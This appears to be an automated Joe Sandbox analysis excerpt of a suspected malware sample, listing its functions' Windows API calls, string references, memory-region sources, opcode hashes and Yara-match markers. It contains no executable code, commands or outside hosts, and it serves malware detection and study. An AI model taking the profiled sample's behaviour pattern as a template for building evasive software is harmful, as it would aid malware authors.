Function 0042B5D0 Relevance: 12.2, APIs: 8, Instructions: 163COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,00000002), ref: 0042B5E3
SizeofResource.KERNEL32(?,00000000,?,753D4920,00000000,753CCF90,?,?,?,?,?,?,?,?,00429221,00000001), ref: 0042B5FD
LoadResource.KERNEL32(?,00000000,?,753D4920,00000000,753CCF90,?,?,?,?,?,?,?,?,00429221,00000001), ref: 0042B607

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Resource$FindLoadSizeof
String ID:
API String ID: 507330600-0
Opcode ID: e227554d3e606af37ac9c7adf08ab6153dfc929cc5b009999a34b0cbde623028
Instruction ID: 2bd4e65345e4648a307fa937d54b53fe69a4e97e7a04a69645469895e5612da4
Opcode Fuzzy Hash: e227554d3e606af37ac9c7adf08ab6153dfc929cc5b009999a34b0cbde623028
Instruction Fuzzy Hash: F141ED323047145BE30CCE29A866AAF77D2EBC8351F448A3EF94683381DBB1D509C7A5

Function 004356B4 Relevance: 12.1, APIs: 8, Instructions: 72stringfileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004356B9
GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 004356D7
lstrcpynA.KERNEL32(?,?,00000104), ref: 004356E6
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0043571A
CharUpperA.USER32(?), ref: 0043572B
FindFirstFileA.KERNEL32(?,?), ref: 00435741
FindClose.KERNEL32(00000000), ref: 0043574D
lstrcpyA.KERNEL32(?,?), ref: 0043575D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
String ID:
API String ID: 304730633-0
Opcode ID: f4937d381607f344ff57ffb754f2e2e1a5d3394c6c0a580c74ab1d8a5ed1b631
Instruction ID: c0db147084aaf2133b08e588491962ddc1b9a6513d6818f395d295dd85775430
Opcode Fuzzy Hash: f4937d381607f344ff57ffb754f2e2e1a5d3394c6c0a580c74ab1d8a5ed1b631
Instruction Fuzzy Hash: 42219D31900519FBCB20AF61DC48AEF7FBCEF09365F00812AF819D6160C7748A45CBA4

Function 004409EE Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160keyboardtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00412462: GetParent.USER32(?), ref: 0041246C

ScreenToClient.USER32(?,?), ref: 00440A78
GetKeyState.USER32(00000001), ref: 00440AD5
GetKeyState.USER32(00000001), ref: 00440B27
GetKeyState.USER32(00000001), ref: 00440B5D
KillTimer.USER32(?,0000E001), ref: 00440B82

Strings

(, xrefs: 00440A93

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: State$ClientKillParentScreenTimer
String ID: (
API String ID: 2757461879-3887548279
Opcode ID: 2856c78f1150ad00cd3fd8fd4808f7e7d3e175980587a12a94ed806d871ada12
Instruction ID: bb85adb36ec830cac896b0670b83cd1ee13571240f16e87466b34a4f475e2a2e
Opcode Fuzzy Hash: 2856c78f1150ad00cd3fd8fd4808f7e7d3e175980587a12a94ed806d871ada12
Instruction Fuzzy Hash: 2751A131A00244EFEF209F94C448BAE7BB1EF54319F10006BEA45A72D2D778A991CB5D

Function 0043791C Relevance: 10.6, APIs: 7, Instructions: 148timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00437921
GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?,?,?), ref: 00437988
GetFileTime.KERNEL32(?,?,?,?,?), ref: 00437A1B
SetFileTime.KERNEL32(?,?,?,?), ref: 00437A46
GetFileSecurityA.ADVAPI32(?,00000004,00000000,00000000,?), ref: 00437A60
GetFileSecurityA.ADVAPI32(?,00000004,00000000,?,?), ref: 00437A7E
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00437A89

Part of subcall function 00435784: lstrcpynA.KERNEL32(00000000,?,00000104,?,?), ref: 004357AB

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: File$Security$Time$DiskFreeH_prologSpacelstrcpyn
String ID:
API String ID: 726943650-0
Opcode ID: 7095577b9b5fa50c70ae2255ca047b181a0c86f0eebc0e9902245b578608130f
Instruction ID: d8126b9d60d336e5889a49e1aa2d2a106c638bf25a7c4b3c0b3bc75efd297fa5
Opcode Fuzzy Hash: 7095577b9b5fa50c70ae2255ca047b181a0c86f0eebc0e9902245b578608130f
Instruction Fuzzy Hash: 3D514EB2500219BFDB11EFA0DC81EEEBBB9FF08344F40812AF91596191DB759A54CB64

Function 00447A76 Relevance: 10.6, APIs: 7, Instructions: 67windowkeyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 00447A87
GetKeyState.USER32(00000010), ref: 00447A97
GetFocus.USER32 ref: 00447AA7
GetDesktopWindow.USER32 ref: 00447AAF
SendMessageA.USER32(?,0000020A,?,?), ref: 00447AD3
SendMessageA.USER32(00000000,0000020A,?,?), ref: 00447AF2
GetParent.USER32(00000000), ref: 00447AFB

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageSendState$DesktopFocusParentWindow
String ID:
API String ID: 4150626516-0
Opcode ID: 63fb053dd3ec1de671bed2ea873e38bc58abf4932435b9463dc1c9217ae537eb
Instruction ID: f02c602c22a79fce62566a6eaede3c9abeaa6944a0dfe14848143c6d14443c2b
Opcode Fuzzy Hash: 63fb053dd3ec1de671bed2ea873e38bc58abf4932435b9463dc1c9217ae537eb
Instruction Fuzzy Hash: 1B11E732A04729BFFB001BA59C54A7E77A9EB047D5B114837FA01EB241E7F49E0247A8

Function 00447A61 Relevance: 7.6, APIs: 5, Instructions: 52keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 00447A87
GetKeyState.USER32(00000010), ref: 00447A97
GetFocus.USER32 ref: 00447AA7
GetDesktopWindow.USER32 ref: 00447AAF
SendMessageA.USER32(?,0000020A,?,?), ref: 00447AD3

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: State$DesktopFocusMessageSendWindow
String ID:
API String ID: 2814764316-0
Opcode ID: 6851d75f88f9adf4de0856daa32a54d778410d69eae2d02e285a2b27bae95376
Instruction ID: 4587adb6153d4684f8330df3f9a083790f6dbe74eeb29fa165ee92dc42b91e2c
Opcode Fuzzy Hash: 6851d75f88f9adf4de0856daa32a54d778410d69eae2d02e285a2b27bae95376
Instruction Fuzzy Hash: D001D8716047197FFB005AA4DC55BA87B98EB04795F104437EA01EB191E6F89D034768

Function 004108B0 Relevance: 6.4, APIs: 4, Instructions: 399timewindowCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,00000000,?,?), ref: 00410972
GetLocalTime.KERNEL32(?,?), ref: 00410BA9
GetLocalTime.KERNEL32(?,?), ref: 00410C44
SendMessageA.USER32(?,?,00000004,?), ref: 00410D84

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: LocalTime$MessageSend
String ID:
API String ID: 1646772473-0
Opcode ID: 23fb850dc5b021990356e4fc56c5507a78a8b372f5edd0ee835030bcf755b237
Instruction ID: 218a72f6eda760af0fc8da623abd46d81ef36ad7078dfc2d704d201102c88440
Opcode Fuzzy Hash: 23fb850dc5b021990356e4fc56c5507a78a8b372f5edd0ee835030bcf755b237
Instruction Fuzzy Hash: 27F14C712043069FC714DF29C890AABB7E5FF88314F008A2EE45A87791EB74E949CB95

Function 0043294D Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00433753: GetWindowLongA.USER32(?,000000F0), ref: 0043375F

GetKeyState.USER32(00000010), ref: 00432971
GetKeyState.USER32(00000011), ref: 0043297A
GetKeyState.USER32(00000012), ref: 00432983
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 00432999

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 5fe0e0249bf8297d1d28fe336e4b31a0874317bdae9261b836355aba798416c2
Instruction ID: 92c532c1d6c86b8d916360a5b72d4a06fbf38b4088ec6c998fcaff1512a9bad1
Opcode Fuzzy Hash: 5fe0e0249bf8297d1d28fe336e4b31a0874317bdae9261b836355aba798416c2
Instruction Fuzzy Hash: 1FF027F630034A79EA2836525D52FF921244F88BFCF11743BF741AA1D18AD8C802067E

Function 0042112E Relevance: 4.7, APIs: 3, Instructions: 207timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041E57A: InitializeCriticalSection.KERNEL32(00000000,?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041E5B7
Part of subcall function 0041E57A: EnterCriticalSection.KERNEL32(?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041E5D2

Part of subcall function 0041E5DB: LeaveCriticalSection.KERNEL32(?,0041A82B,00000009,?,0041E5C6,00000000,?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379), ref: 0041E5E8

GetTimeZoneInformation.KERNEL32(0000000C,00000000,0000000C,?,0000000B,0000000B,?,0042111F,0041B374,00000000,?,?,0041B1E7,00000000,00000001), ref: 0042117C
WideCharToMultiByte.KERNEL32(00000220,0046D8CC,000000FF,0000003F,00000000,00000000,?,0000000B,0000000B,?,0042111F,0041B374,00000000,?,?,0041B1E7), ref: 00421212
WideCharToMultiByte.KERNEL32(00000220,0046D920,000000FF,0000003F,00000000,00000000,?,0000000B,0000000B,?,0042111F,0041B374,00000000,?,?,0041B1E7), ref: 0042124B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
String ID:
API String ID: 3442286286-0
Opcode ID: 24f689a4b64432e89a9236c4101037f33dfc57f456c13269eab2ab1650682b78
Instruction ID: b6f1ebdbc481fb2cc25d0837eb30bdf27f5de614b0d43481cb2803b5c46e81ba
Opcode Fuzzy Hash: 24f689a4b64432e89a9236c4101037f33dfc57f456c13269eab2ab1650682b78
Instruction Fuzzy Hash: E461F5B0B042609AE721AF25BC41B663BBAF715310F54013FE840962B1F7B88992CB5F

Function 0043011A Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 00430139
LoadResource.KERNEL32(?,00000000), ref: 00430141
LockResource.KERNEL32(?), ref: 0043014D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Resource$FindLoadLock
String ID:
API String ID: 2752051264-0
Opcode ID: a81cc26cf07f0ce9a17663927f5d572794724dee6e09c9fb8cc023b11bce1a55
Instruction ID: 1370b640bdf549fc331f3e2fed8ab8f7967ea5dbc6853da38e9abef938a1d5ed
Opcode Fuzzy Hash: a81cc26cf07f0ce9a17663927f5d572794724dee6e09c9fb8cc023b11bce1a55
Instruction Fuzzy Hash: DC01B536200B119BDF345B649C74A67B374FF08BA1F00551AED4697780D7BAEC41C7A8

Function 00412364 Relevance: 4.5, APIs: 3, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e08ae203d63afd11eb681bfb6a21efc581b94396ee38f796d430245d7678994
Instruction ID: 3812dab03e23b7c6ff89d221090534288f2166b61a0562501955728941f94f77
Opcode Fuzzy Hash: 6e08ae203d63afd11eb681bfb6a21efc581b94396ee38f796d430245d7678994
Instruction Fuzzy Hash: D3F0193150420DABCF055F71CE04AFE3B79AB04345B448126FC29D5121EBBCCAB6AB6A

Function 00436BB5 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00436BC8
GetParent.USER32(?), ref: 00436BEB
IsIconic.USER32(?), ref: 00436BFD

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Parent$Iconic
String ID:
API String ID: 344791563-0
Opcode ID: f58f5cfbfec8b523932c1014ae305ccc86840736004665b20e033f665e69177d
Instruction ID: 1223f96d8b98375fcfe4191e2cfed79e55f83c51ba89510e5123db549744b13d
Opcode Fuzzy Hash: f58f5cfbfec8b523932c1014ae305ccc86840736004665b20e033f665e69177d
Instruction Fuzzy Hash: 57F05431300206BEDB246F219D15E2B7668EF88355F12B43AB840D7162DA39DC06CB68

Function 00434637 Relevance: 4.5, APIs: 3, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 0043465E
GetKeyState.USER32(00000011), ref: 00434667
GetKeyState.USER32(00000012), ref: 00434670

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: 1dc828347d4aa570ffc3f2b5ead5f0bdaee99c2ce4547961934f1e1a46673023
Instruction ID: f4623c28e3b256aeff6647a6b53cf767ce999c7f18c4e9a4a8b27b5b72e202b9
Opcode Fuzzy Hash: 1dc828347d4aa570ffc3f2b5ead5f0bdaee99c2ce4547961934f1e1a46673023
Instruction Fuzzy Hash: 9EE02B745002999DEA006ED48802FD63E904F9E7D0F00A457EB44AB0A6C7ACE8428B6C

Function 006963F0 Relevance: 4.3, Strings: 3, Instructions: 560COMMON

Download Yara Rule

Strings

lmu/, xrefs: 00696C24
*', xrefs: 0069665D
lmu/, xrefs: 00696B42

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID: *'$lmu/$lmu/
API String ID: 0-636906075
Opcode ID: 35aa3bedca782e4742acf8894702b9462b64764795357aec964aacdbd80c62bd
Instruction ID: b6a18d171d0325c2aafb156f98b60da1415a2ee54e5f9ec40edc8c4d8280f42b
Opcode Fuzzy Hash: 35aa3bedca782e4742acf8894702b9462b64764795357aec964aacdbd80c62bd
Instruction Fuzzy Hash: 55021531A043008BCE64EAB8D88556E76DF9BD4B48F64882FF446CBF51EE24CD468797

Function 00547F8E Relevance: 4.3, Strings: 3, Instructions: 560COMMON

Download Yara Rule

Strings

*', xrefs: 005481FB
lmu/, xrefs: 005486E0
lmu/, xrefs: 005487C2

Memory Dump Source

Source File: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID: *'$lmu/$lmu/
API String ID: 0-636906075
Opcode ID: b7524a3de83cd4a76f4d447deb268b03eed86ef20e49021a3d0791e93a30b770
Instruction ID: 281e2b7587ee9e544a92114bd01a0a855f57d44c0afd155166d80509af8c90f4
Opcode Fuzzy Hash: b7524a3de83cd4a76f4d447deb268b03eed86ef20e49021a3d0791e93a30b770
Instruction Fuzzy Hash: 5C02D335A083068BCA24AA78888D1FE7ED1BBD474CF744D2AF555CB351EE24CD4987A3

Function 005498FE Relevance: 4.0, Strings: 3, Instructions: 219COMMON

Download Yara Rule

Strings

fX, xrefs: 00549922
DR, xrefs: 0054993A
Ou, xrefs: 005499C8

Memory Dump Source

Source File: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID: DR$Ou$fX
API String ID: 0-261343277
Opcode ID: 9a4cfae2509eada84d4514ed3e752f1f713b4941d1beb8100a69beae9a0044a5
Instruction ID: 2d1db86fe652c16b7a67daf61a0f791823f74549bdc8cc53a3660b7995c162cd
Opcode Fuzzy Hash: 9a4cfae2509eada84d4514ed3e752f1f713b4941d1beb8100a69beae9a0044a5
Instruction Fuzzy Hash: AF8190716083028FD728DF65D9896AFBAE4BBC8718F10092DF089D7394E774D909CB56

Function 00549C6E Relevance: 3.9, Strings: 3, Instructions: 169COMMON

Download Yara Rule

Strings

Ou, xrefs: 00549D2E
DR, xrefs: 00549CA6
m, xrefs: 00549C9E

Memory Dump Source

Source File: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID: DR$Ou$m
API String ID: 0-902897619
Opcode ID: b62bf488743f1a2059ce3998f655a55e53d780affa885b97e3efcba5522db659
Instruction ID: 93817932903c2e3f88622516500fbeff78649adc4578c4df8df343cafbd9744c
Opcode Fuzzy Hash: b62bf488743f1a2059ce3998f655a55e53d780affa885b97e3efcba5522db659
Instruction Fuzzy Hash: B1619371A087029FD728DF68C84A9AFBBE4BBD4718F04491DF49597294D7B8C909CF82

Function 00698660 Relevance: 3.9, Strings: 3, Instructions: 160COMMON

Download Yara Rule

Strings

#CH., xrefs: 006987E4
#CH., xrefs: 006987C6
\au , xrefs: 006987EE

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID: #CH.$#CH.$\au
API String ID: 0-122621526
Opcode ID: 0dbc76b18b1a26010feb798f952038391c1427842b8a8dc3d57b93046c0284d4
Instruction ID: 743cffc8d151364ba0efe8c6de6b66076f300aa74884d992d135e99a4a6a1f30
Opcode Fuzzy Hash: 0dbc76b18b1a26010feb798f952038391c1427842b8a8dc3d57b93046c0284d4
Instruction Fuzzy Hash: D141E271B042009FDF609FA89C91ABF729FAB92740F54083EB509DFB95DE65DD018392

Function 0043170E Relevance: 3.4, APIs: 2, Instructions: 422COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00431713
GetVersion.KERNEL32(00000007,?,?,00000000,00000000,?,0000C000,00000000,00000000,00000007), ref: 004318C6

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: H_prologVersion
String ID:
API String ID: 1836448879-0
